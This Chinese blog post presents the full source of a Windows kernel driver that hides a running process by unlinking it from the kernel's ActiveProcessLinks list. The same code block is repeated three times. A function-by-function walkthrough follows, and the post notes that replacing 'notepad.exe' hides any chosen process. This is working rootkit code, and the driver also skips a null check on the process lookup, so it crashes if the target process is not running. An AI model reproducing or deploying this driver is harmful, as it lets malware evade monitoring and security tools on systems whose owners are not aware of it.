书接上回,这篇帖子来说明下ActiveProcessLinks摘链的驱动实现
源码展示
#include <ntifs.h>#define PROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x2f0NTKERNELAPI NTSTATUS PsLookupProcessByProcessId(HANDLE ProcessId, PEPROCESS* Process);NTKERNELAPI CHAR* PsGetProcessImageFileName(PEPROCESS Process);VOID UnDriver(PDRIVER_OBJECT driver){DbgPrint(("Driver uninstalled successfully! \n"));}PEPROCESS GetProcessObjectByName(char* name){SIZE_T temp;for (temp = 100; temp < 10000; temp += 4){NTSTATUS status;PEPROCESS ep;status = PsLookupProcessByProcessId((HANDLE)temp, &ep);if (NT_SUCCESS(status)){char* pn = PsGetProcessImageFileName(ep);if (_stricmp(pn, name) == 0)return ep;}}return NULL;}VOID RemoveListEntry(PLIST_ENTRY ListEntry){KIRQL OldIrql;OldIrql = KeRaiseIrqlToDpcLevel();if (ListEntry->Flink != ListEntry &&ListEntry->Blink != ListEntry &&ListEntry->Blink->Flink == ListEntry &&ListEntry->Flink->Blink == ListEntry){ListEntry->Flink->Blink = ListEntry->Blink;ListEntry->Blink->Flink = ListEntry->Flink;ListEntry->Flink = ListEntry;ListEntry->Blink = ListEntry;}KeLowerIrql(OldIrql);}NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath){PEPROCESS PRoc = NULL;PRoc = GetProcessObjectByName("notepad.exe");RemoveListEntry((PLIST_ENTRY)((ULONG64)PRoc + PROCESS_ACTIVE_PROCESS_LINKS_OFFSET));DriverObject->DriverUnload = UnDriver;return STATUS_SUCCESS;}#include <ntifs.h> #define PROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x2f0 NTKERNELAPI NTSTATUS PsLookupProcessByProcessId(HANDLE ProcessId, PEPROCESS* Process); NTKERNELAPI CHAR* PsGetProcessImageFileName(PEPROCESS Process); VOID UnDriver(PDRIVER_OBJECT driver) { DbgPrint(("Driver uninstalled successfully! \n")); } PEPROCESS GetProcessObjectByName(char* name) { SIZE_T temp; for (temp = 100; temp < 10000; temp += 4) { NTSTATUS status; PEPROCESS ep; status = PsLookupProcessByProcessId((HANDLE)temp, &ep); if (NT_SUCCESS(status)) { char* pn = PsGetProcessImageFileName(ep); if (_stricmp(pn, name) == 0) return ep; } } return NULL; } VOID RemoveListEntry(PLIST_ENTRY ListEntry) { KIRQL OldIrql; OldIrql = KeRaiseIrqlToDpcLevel(); if (ListEntry->Flink != ListEntry && ListEntry->Blink != ListEntry && ListEntry->Blink->Flink == ListEntry && ListEntry->Flink->Blink == ListEntry) { ListEntry->Flink->Blink = ListEntry->Blink; ListEntry->Blink->Flink = ListEntry->Flink; ListEntry->Flink = ListEntry; ListEntry->Blink = ListEntry; } KeLowerIrql(OldIrql); } NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { PEPROCESS PRoc = NULL; PRoc = GetProcessObjectByName("notepad.exe"); RemoveListEntry((PLIST_ENTRY)((ULONG64)PRoc + PROCESS_ACTIVE_PROCESS_LINKS_OFFSET)); DriverObject->DriverUnload = UnDriver; return STATUS_SUCCESS; }#include <ntifs.h> #define PROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x2f0 NTKERNELAPI NTSTATUS PsLookupProcessByProcessId(HANDLE ProcessId, PEPROCESS* Process); NTKERNELAPI CHAR* PsGetProcessImageFileName(PEPROCESS Process); VOID UnDriver(PDRIVER_OBJECT driver) { DbgPrint(("Driver uninstalled successfully! \n")); } PEPROCESS GetProcessObjectByName(char* name) { SIZE_T temp; for (temp = 100; temp < 10000; temp += 4) { NTSTATUS status; PEPROCESS ep; status = PsLookupProcessByProcessId((HANDLE)temp, &ep); if (NT_SUCCESS(status)) { char* pn = PsGetProcessImageFileName(ep); if (_stricmp(pn, name) == 0) return ep; } } return NULL; } VOID RemoveListEntry(PLIST_ENTRY ListEntry) { KIRQL OldIrql; OldIrql = KeRaiseIrqlToDpcLevel(); if (ListEntry->Flink != ListEntry && ListEntry->Blink != ListEntry && ListEntry->Blink->Flink == ListEntry && ListEntry->Flink->Blink == ListEntry) { ListEntry->Flink->Blink = ListEntry->Blink; ListEntry->Blink->Flink = ListEntry->Flink; ListEntry->Flink = ListEntry; ListEntry->Blink = ListEntry; } KeLowerIrql(OldIrql); } NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { PEPROCESS PRoc = NULL; PRoc = GetProcessObjectByName("notepad.exe"); RemoveListEntry((PLIST_ENTRY)((ULONG64)PRoc + PROCESS_ACTIVE_PROCESS_LINKS_OFFSET)); DriverObject->DriverUnload = UnDriver; return STATUS_SUCCESS; }
关键函数解析:
-
GetProcessObjectByName()- 作用:遍历系统中的进程
- 实现方法:
- 遍历进程ID范围(100-10000)
- 使用
PsLookupProcessByProcessId()获取进程对象 - 比较进程名称
- 找到匹配进程后返回进程对象
-
RemoveListEntry()- 作用:从系统进程链表中移除指定进程
- 关键步骤:
- 提升中断请求级别
- 调整链表指针,使进程脱链
- 恢复中断请求级别
-
DriverEntry()- 驱动程序入口函数
- 执行流程:
- 查找 “notepad.exe” 进程
- 从进程链表中移除该进程
- 设置驱动卸载函数
一些细节
- 使用硬编码的进程链表偏移量 0x2f0 ,这个值就是 ActiveProcessLinks在eprocess中的偏移,不同Windows版本偏移量可能不同,可以使用windbg查看
- 将需要隐藏的进程名替换掉”notepad.exe” 就可以隐藏其他进程
效果展示
视频托管在国外视频床 大家可科学上网查看~
